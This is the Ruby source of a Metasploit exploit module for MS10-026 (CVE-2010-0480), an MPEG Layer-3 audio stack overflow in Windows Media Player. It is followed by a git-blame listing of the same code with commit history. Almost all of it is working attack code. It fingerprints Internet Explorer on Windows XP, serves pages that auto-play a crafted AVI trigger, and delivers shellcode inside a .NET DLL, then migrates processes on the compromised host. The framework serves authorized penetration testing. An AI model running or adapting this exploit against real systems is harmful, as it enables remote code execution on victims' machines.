modules/exploits/windows/browser/ms10_026_avi_nsamplespersec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in l3codecx.ax while processing a
        AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite
        with 0's so the three least significant bytes of EIP saved on stack are
        overwritten and shellcode is mapped using the .NET DLL memory technique pioneered
        by Alexander Sotirov and Mark Dowd.

        Please note on IE 8 targets, your malicious URL must be a trusted site in order
        to load the .Net control.
      },
      'Author'         =>
        [
          'Yamata Li', # Vulnerability Discovery
          'Shahin Ramezany <shahin[at]abysssec.com>', # Vulnerability Analysis and Exploit
          'juan vazquez', # Metasploit module
          'Jordi Sanchez <jsanchez[at]0x01000000.org>', # Metasploit module - Help
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2010-0480'],
          ['OSVDB', '63749'],
          ['BID', '39303'],
          ['MSB', 'MS10-026'],
          ['URL', 'https://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/'],
          ['URL', 'http://www.phreedom.org/research/bypassing-browser-memory-protections/']
        ],
      'Payload'        =>
        {
          'Space'    => 4000
        },
      'DefaultOptions' =>
        {
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Platform'       => %w{ win },
      'Targets'        =>
        [
          # Target 0: Automatic
          # Tested with:
          # Windows XP SP3 English IE 6
          # Windows XP SP3 English IE 7
          # Windows XP SP3 English IE 8: The exploiting site must be a trusted
          # site to load the .NET control
          # .NET CLR required
          [
            'Windows XP SP3 Automatic',
            {
              'Platform' => 'win',
              'Ret' => 0x72000000
            },
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2010-04-13'))
  end

  def exploit
    # Embed our payload in a .Net binary
    ibase = target.ret - 0x10000
    shellcode = rand_text_alpha(target.ret - ibase - 0x2285)
    shellcode << payload.encoded

    #Use our own custom .Net binary, because we require a much bigger file
    #to land our payload at the right place
    opts = {
      :template    => 'template_dotnetmem.dll',
      :text_offset => 0x1285,
      :text_max    => 0x20000,
      :pack        => 'a131072',
      :uuid_offset => 135816
    }

    @dotnet_payload = Msf::Util::EXE.to_dotnetmem(ibase, shellcode, opts)

    # Load our AVI file
    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2010-0480.avi")
    f = File.open(path, "rb")
    @trigger = f.read(f.stat.size)
    f.close

    super
  end

  def on_request_uri(cli, request)

    agent = request['User-Agent']
    case request['User-Agent']
      when /MSIE.*Windows NT 5\.1.*\.NET CLR .*/
      when /Windows-Media-Player/
        # AVI is requested by WMP
      else
        send_not_found(cli)
        print_error("target not supported: #{agent}")
        return
    end

    if (request.uri =~ /\.html/i)
      avi_name = rand_text_alpha(4)
      avi_trigger = ""

      if ("/" == get_resource[-1,1])
        avi_trigger = get_resource[0, get_resource.length - 1]
      else
        avi_trigger = get_resource
      end

      avi_trigger << "/#{avi_name}.avi"

      html = %Q|<html>
      <body>
      <OBJECT ID="MediaPlayer"
      CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95"
      CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#
      Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..."
      TYPE="application/x-oleobject" width="280" height="46">
        <param name="fileName" value="#{avi_trigger}">
        <param name="animationatStart" value="true">
        <param name="transparentatStart" value="true">
        <param name="autoStart" value="true">
        <param name="showControls" value="true">
        <param name="Volume" value="-300">
      <embed type="application/x-mplayer2"
        pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"
        src="#{avi_trigger}"
        name="MediaPlayer"
        width=280
        height=46
        autostart=1
        showcontrols=1
        volume=-300>
      </embed>
      </OBJECT>
      </body>
      </html>
      |

      html = html.gsub(/^ {6}/, '')

      print_status("Sending trigger loader")
      send_response_html(cli, html)

    elsif (request.uri =~ /\.avi$/i)

      print_status "Sending AVI trigger"
      send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' })
      return

    elsif (request.uri =~ /\.dll$/i)

      print_status "Sending DLL file"
      send_response(
        cli,
        @dotnet_payload,
        {
          'Content-Type' => 'application/x-msdownload',
          'Connection'   => 'close',
          'Pragma'       => 'no-cache'
        }
      )
      return

    end

    html_name = rand_text_alpha(4)
    dll_uri = ""
    html_trigger = ""

    if ("/" == get_resource[-1,1])
      dll_uri = get_resource[0, get_resource.length - 1]
      html_trigger = get_resource[0, get_resource.length - 1]
    else
      dll_uri = get_resource
      html_trigger = get_resource
    end

    dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"
    js_net_dll = "<object classid=\"#{dll_uri}\"#GenericControl\"><object>"
    html_trigger << "/#{html_name}.html"

    html  = %Q|<html>
    <head>
    <script language="javascript">
      function forward() {
        window.location = window.location + '#{html_trigger}';
      }

      function start() {
        setTimeout("forward()", 2000);
      }
    </script>
    </head>
    <body onload="start()">
    <object classid="#{dll_uri}#GenericControl">
    <object>
    </body>
    </html>
    |

    html = html.gsub(/^ {4}/, '')

    print_status("Sending #{self.name}")
    send_response_html(cli, html)
  end
end
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`Rank = NormalRanking`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`include Msf::Exploit::Remote::HttpServer::HTML`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow',`
			`'Description' => %q{`
224 pages of spelling issues left 2017-09-09 09:52:08 -04:00			`This module exploits a buffer overflow in l3codecx.ax while processing a`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`AVI files with MPEG Layer-3 audio contents. The overflow only allows to overwrite`
			`with 0's so the three least significant bytes of EIP saved on stack are`
			`overwritten and shellcode is mapped using the .NET DLL memory technique pioneered`
			`by Alexander Sotirov and Mark Dowd.`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`Please note on IE 8 targets, your malicious URL must be a trusted site in order`
			`to load the .Net control.`
			`},`
			`'Author' =>`
			`[`
			`'Yamata Li', # Vulnerability Discovery`
Fix author email format 2011-11-12 01:53:25 -06:00			`'Shahin Ramezany <shahin[at]abysssec.com>', # Vulnerability Analysis and Exploit`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`'juan vazquez', # Metasploit module`
			`'Jordi Sanchez <jsanchez[at]0x01000000.org>', # Metasploit module - Help`
			`],`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`['CVE', '2010-0480'],`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`['OSVDB', '63749'],`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`['BID', '39303'],`
			`['MSB', 'MS10-026'],`
OCD fixes - Spaces 2017-07-14 08:46:59 +01:00			`['URL', 'https://www.exploit-db.com/moaub-5-microsoft-mpeg-layer-3-audio-stack-based-overflow/'],`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`['URL', 'http://www.phreedom.org/research/bypassing-browser-memory-protections/']`
			`],`
			`'Payload' =>`
			`{`
			`'Space' => 4000`
			`},`
			`'DefaultOptions' =>`
			`{`
Fix #8002 , Use post/windows/manage/priv_migrate instead of migrate -f 2017-02-23 17:04:36 -06:00			`'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`},`
Bug #8419 - Added platform info missing on exploits 2013-10-08 22:41:50 -04:00			`'Platform' => %w{ win },`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`'Targets' =>`
			`[`
			`# Target 0: Automatic`
			`# Tested with:`
			`# Windows XP SP3 English IE 6`
			`# Windows XP SP3 English IE 7`
			`# Windows XP SP3 English IE 8: The exploiting site must be a trusted`
			`# site to load the .NET control`
			`# .NET CLR required`
			`[`
			`'Windows XP SP3 Automatic',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x72000000`
			`},`
			`]`
			`],`
			`'DefaultTarget' => 0,`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2010-04-13'))`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`def exploit`
			`# Embed our payload in a .Net binary`
			`ibase = target.ret - 0x10000`
			`shellcode = rand_text_alpha(target.ret - ibase - 0x2285)`
			`shellcode << payload.encoded`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`#Use our own custom .Net binary, because we require a much bigger file`
			`#to land our payload at the right place`
			`opts = {`
			`:template => 'template_dotnetmem.dll',`
			`:text_offset => 0x1285,`
			`:text_max => 0x20000,`
Specify UUID offset for the custom .Net binary 2011-08-13 02:15:05 +00:00			`:pack => 'a131072',`
			`:uuid_offset => 135816`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`}`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`@dotnet_payload = Msf::Util::EXE.to_dotnetmem(ibase, shellcode, opts)`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`# Load our AVI file`
Find and replace 2013-09-26 20:34:48 +01:00			`path = File.join(Msf::Config.data_directory, "exploits", "CVE-2010-0480.avi")`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`f = File.open(path, "rb")`
			`@trigger = f.read(f.stat.size)`
			`f.close`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`super`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`def on_request_uri(cli, request)`
Retab modules 2013-08-30 16:28:54 -05:00
Specify UUID offset for the custom .Net binary 2011-08-13 02:15:05 +00:00			`agent = request['User-Agent']`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`case request['User-Agent']`
			`when /MSIE.Windows NT 5\.1.\.NET CLR .*/`
			`when /Windows-Media-Player/`
			`# AVI is requested by WMP`
			`else`
			`send_not_found(cli)`
Remove spurious cli.peerhost in output 2012-04-20 13:31:42 -06:00			`print_error("target not supported: #{agent}")`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`if (request.uri =~ /\.html/i)`
			`avi_name = rand_text_alpha(4)`
			`avi_trigger = ""`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`if ("/" == get_resource[-1,1])`
			`avi_trigger = get_resource[0, get_resource.length - 1]`
			`else`
			`avi_trigger = get_resource`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`avi_trigger << "/#{avi_name}.avi"`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`html = %Q\|<html>`
			`<body>`
			`<OBJECT ID="MediaPlayer"`
			`CLASSID="CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95"`
			`CODEBASE="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#`
			`Version=5,1,52,701" STANDBY="Loading Microsoft Windows Media Player components..."`
			`TYPE="application/x-oleobject" width="280" height="46">`
			`<param name="fileName" value="#{avi_trigger}">`
			`<param name="animationatStart" value="true">`
			`<param name="transparentatStart" value="true">`
			`<param name="autoStart" value="true">`
			`<param name="showControls" value="true">`
			`<param name="Volume" value="-300">`
			`<embed type="application/x-mplayer2"`
			`pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"`
			`src="#{avi_trigger}"`
			`name="MediaPlayer"`
			`width=280`
			`height=46`
			`autostart=1`
			`showcontrols=1`
			`volume=-300>`
			`</embed>`
			`</OBJECT>`
			`</body>`
			`</html>`
			`\|`
Retab modules 2013-08-30 16:28:54 -05:00
Make gsubs compliant with the new indentation standard 2013-12-31 11:06:53 -06:00			`html = html.gsub(/^ {6}/, '')`
Retab modules 2013-08-30 16:28:54 -05:00
Remove spurious cli.peerhost in output 2012-04-20 13:31:42 -06:00			`print_status("Sending trigger loader")`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`send_response_html(cli, html)`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`elsif (request.uri =~ /\.avi$/i)`
Retab modules 2013-08-30 16:28:54 -05:00
Remove spurious cli.peerhost in output 2012-04-20 13:31:42 -06:00			`print_status "Sending AVI trigger"`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' })`
			`return`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`elsif (request.uri =~ /\.dll$/i)`
Retab modules 2013-08-30 16:28:54 -05:00
Remove spurious cli.peerhost in output 2012-04-20 13:31:42 -06:00			`print_status "Sending DLL file"`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`send_response(`
			`cli,`
			`@dotnet_payload,`
			`{`
			`'Content-Type' => 'application/x-msdownload',`
			`'Connection' => 'close',`
			`'Pragma' => 'no-cache'`
			`}`
			`)`
			`return`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`html_name = rand_text_alpha(4)`
			`dll_uri = ""`
			`html_trigger = ""`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`if ("/" == get_resource[-1,1])`
			`dll_uri = get_resource[0, get_resource.length - 1]`
			`html_trigger = get_resource[0, get_resource.length - 1]`
			`else`
			`dll_uri = get_resource`
			`html_trigger = get_resource`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`dll_uri << "/generic-" + Time.now.to_i.to_s + ".dll"`
			`js_net_dll = "<object classid=\"#{dll_uri}\"#GenericControl\"><object>"`
			`html_trigger << "/#{html_name}.html"`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`html = %Q\|<html>`
			`<head>`
			`<script language="javascript">`
			`function forward() {`
			`window.location = window.location + '#{html_trigger}';`
			`}`
Retab modules 2013-08-30 16:28:54 -05:00
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`function start() {`
			`setTimeout("forward()", 2000);`
			`}`
			`</script>`
			`</head>`
			`<body onload="start()">`
			`<object classid="#{dll_uri}#GenericControl">`
			`<object>`
			`</body>`
			`</html>`
			`\|`
Retab modules 2013-08-30 16:28:54 -05:00
Make gsubs compliant with the new indentation standard 2013-12-31 11:06:53 -06:00			`html = html.gsub(/^ {4}/, '')`
Retab modules 2013-08-30 16:28:54 -05:00
Remove spurious cli.peerhost in output 2012-04-20 13:31:42 -06:00			`print_status("Sending #{self.name}")`
Add MS10-026 exploit 2011-08-12 19:04:25 +00:00			`send_response_html(cli, html)`
			`end`
			`end`